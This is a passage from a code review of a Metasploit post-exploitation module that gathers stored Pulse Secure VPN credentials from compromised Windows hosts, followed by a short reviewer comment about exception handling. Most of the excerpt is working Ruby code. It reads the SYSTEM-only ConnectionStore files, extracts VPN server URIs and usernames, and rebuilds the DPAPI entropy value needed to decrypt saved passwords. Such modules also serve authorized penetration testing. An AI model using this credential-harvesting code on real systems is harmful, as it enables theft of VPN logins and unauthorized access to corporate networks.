modules/post/windows/gather/credentials/pulse_secure.rb

```diff
@@ -0,0 +1,359 @@
+    ]
+    begin
+      ives = {}
+      connstore_paths.each do |path|
+        next unless session.fs.file.exist?(path)
+        connstore_file = session.fs.file.open(path) rescue nil
+        next if connstore_file.nil?
+
+        connstore_data = connstore_file.read.to_s
+        matches = connstore_data.scan(/ive "([a-z0-9]*)" {.*?connection-source: "([^"]*)".*?friendly-name: "([^"]*)".*?uri: "([^"]*)".*?}/m)
+        matches.each do |m|
+          ives[m[0]] = {}
+          ives[m[0]]['connection-source'] = m[1]
+          ives[m[0]]['friendly-name'] = m[2]
+          ives[m[0]]['uri'] = m[3]
+          ives[m[0]]['creds'] = []
+        end
+      end
+      return ives
+    rescue Rex::Post::Meterpreter::RequestError => e
+      vprint_error(e.message)
+    end
+  end
+
+  # Pulse Secure Connect client service creates two files for each user that
+  # established a VPN connection at some point in time. The filename contains
+  # the user SID, with '.dat' or '.bak' as suffix.
+  #
+  # These files are only readable by SYSTEM and contains connection details
+  # for each IVE the user connected with. We use these details to extract
+  # the actual username used to establish the VPN connection if the module
+  # was run as the SYSTEM user.
+  #
+  # @return [String, nil] the username used by user linked to `sid` when establishing
+  # a connection with IVE `ive_index`, nil if none.
+  #
+  def get_username(sid, ive_index)
+    paths = [
+      "C:\\ProgramData\\Pulse Secure\\ConnectionStore\\#{sid}.dat",
+      "C:\\ProgramData\\Pulse Secure\\ConnectionStore\\#{sid}.bak",
+      "C:\\ProgramData\\Pulse Secure\\ConnectionStore\\#{sid}.tmp",
+    ]
+    begin
+      return unless is_system?
+      paths.each do |path|
+        next unless session.fs.file.exist?(path)
+
+        connstore_data = session.fs.file.open(path).read.to_s
+        matches = connstore_data.scan(/userdata "([a-z0-9]*)" {.*?username: "([^"]*)".*?}/m)
+        matches.each do |m|
+          if m[0] == ive_index
+            return m[1]
+          end
+        end
+      end
+    rescue Rex::Post::Meterpreter::RequestError => e
+      vprint_error(e.message)
+    end
+    return nil
+  end
+
+  # Implements IVE index to pOptionalEntropy value like Pulse Secure Connect
+  # client does.
+  #
+  # @return [String] pOptionalEntropy representation of `ive_index`.
+  #
+  def get_entropy_from_ive_index(ive_index)
+    return "IVE:#{ive_index.upcase}"
+  end
+
+  def find_creds
+
+    # If we execute with elevated privileges, we can go through all registry values
+    # so we load all profiles. If we run without privileges, we just load our current
+    # user profile. We have to do that otherwise we try to access registry values that
+    # we are not allwoed to, triggering a 'Profile doesn't exist or cannot be accessed'
+    # error.
+    if is_system?
+      profiles = grab_user_profiles
+    else
+      profiles = [{ 'SID' => session.sys.config.getsid }]
```

Comment:
Considering you are using the session object here and your other code rescues on `rescue Rex::Post::Meterpreter::RequestError`, you should probably also be adding wrapping exception handling here.

Reply:
See f4bb5f7e10